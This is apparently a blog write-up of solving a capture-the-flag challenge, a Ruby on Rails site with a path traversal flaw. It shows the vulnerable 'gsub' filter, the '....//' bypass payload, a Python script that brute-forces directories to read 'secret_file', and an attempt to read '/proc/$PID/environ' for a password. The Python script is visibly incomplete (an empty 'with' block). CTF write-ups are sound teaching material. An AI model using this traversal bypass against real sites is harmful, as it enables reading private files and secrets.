3 minute read

I got the opportunity to participate in the Ascenda CTF Challenge after applying for the Internship program.

Problem Overview

The website is built using Ruby on Rails and is hosted on Fly.io: problem. The challenge is to find the flag from the given website.


In this section, I will explain how I solved the challenge.

Analyzing the Application

Some of the key points should be noted to analyze the application:

  • config/routes.rb: This file contains the routing configuration for the application. It maps the URL to the controllers stored in the app/controllers directory.
    • \ is mapped to pages#index which means the root URL will be handled by the index action of the PagesController.
    • \user_sessions and \users are used for user authentication and retrieval of user information.
    • These actions also are used to replace data in the *.html.erb file to render the pages.

After understading 3 controllers, I found that PagesController render the image anya/anya.png if :img parameter is not provided, otherwise it will render the image specified in the :img parameter.

image = (anya_path + params.fetch(:img, 'anya.png')).gsub("../", "")
file = File.open(image)
@img = Base64.encode64(file.read)

Exploiting the Vulnerability

The vulnerability is in the image variable which allows attacker can read any file (Path Traversal) by providing the :img parameter. However, the ../, used for changing the directory, is replaced with empty string, so we need to bypass this filter by using ....// which will be converted to ../ by gsub method.

Let get a sample payload to read the anya1.txt file: "https://hello-anya.fly.dev/?img=anya1.txt" and analyze the response:

  <h1>Yororosu onegaisurumasu - Anya</h1>
  <img class="styled-image" src="
" />


After decoding "WW9yb3Jvc3Ugb25lZ2Fpc3VydW1hc3UgLSB5b3Jvc2hpa3Ugb25lZ2Fpc2hpbWFzdQ==", I got "Yororosu onegaisurumasu - yoroshiku onegaishimasu" which is the content of the anya1.txt file. So we have to find a way to read the secret_file to get the flag.

In the README.md, the flag is stored in the secret_file which is not included in the source code provided.

In config/initializers/assets.rb, the secret_file is placed in a random directory inside the source code. So the format payload will be ....//<directory>/secret_file which is passed to the :img parameter. (e.g "https://hello-anya.fly.dev/?img=....//abc/secret_file")

Building the payload

I wrote a Python script to bruteforce the directory for the secret_file. This script should placed in the root directory of the source code to get all the possible directories.

import os, requests

directory = '.'
subdirectories = [x[0][2:] + '/' for x in os.walk(directory)]

url = "https://hello-anya.fly.dev/?img=....//"
filename = "secret_file"

for subdirectory in subdirectories:
    full_url = url + subdirectory + filename

    a = requests.get(url=full_url)
    content = a.text

    # Skip if the file is not found by using a part of `anya.png` image to check
    if "/k57MlgYhmcBYKpNXxo1IwA=" in content:
        print("Not found")
    with open("response_" + full_url.replace('/', '_') + filename + ".html", 'w') as file:

    print("Response saved in response_" + full_url.replace('/', '_') + filename + ".html")

After running the script, I found the secret_file in the app and test directories. Get the base64 encoded flag from the response: MTliZWRiZTY4MWM4MDgyYjNhNTBhMmFjNDQ2NmU2NjJlMzU4ZjRiMTQ0NDAwZjNhNjY4ZWJlZDNmNzVjZjhhNw==


After decoding the base64 encoded flag, I got the flag.

The flag is 19bedbe681c8082b3a50a2ac4466e662e358f4b144400f3a668ebed3f75cf8a7

Extra Discussion (!!)

Take a closer look at the source code, I found there is a special user anya. When logging in as anya, the app/views/layouts/_header.html.erb will include a secret page in the header (<li><a href="/pages/anya">Secret Page</a></li>). Additionally, the password of anya is set in db/seeds.rb by hasing the raw password from environment variable ANYA_PASSWORD. So I modified the above script to bruteforce all environment files of the system, user and also in /proc/$PID/environ but I couldn’t find the ANYA_PASSWORD environment variable. So I couldn’t login as anya to get the secret page.

However, I also found that the route pages/anya is not configured in routes.rb so that might be a bit confusing for me whether there was a hidden challenge or not.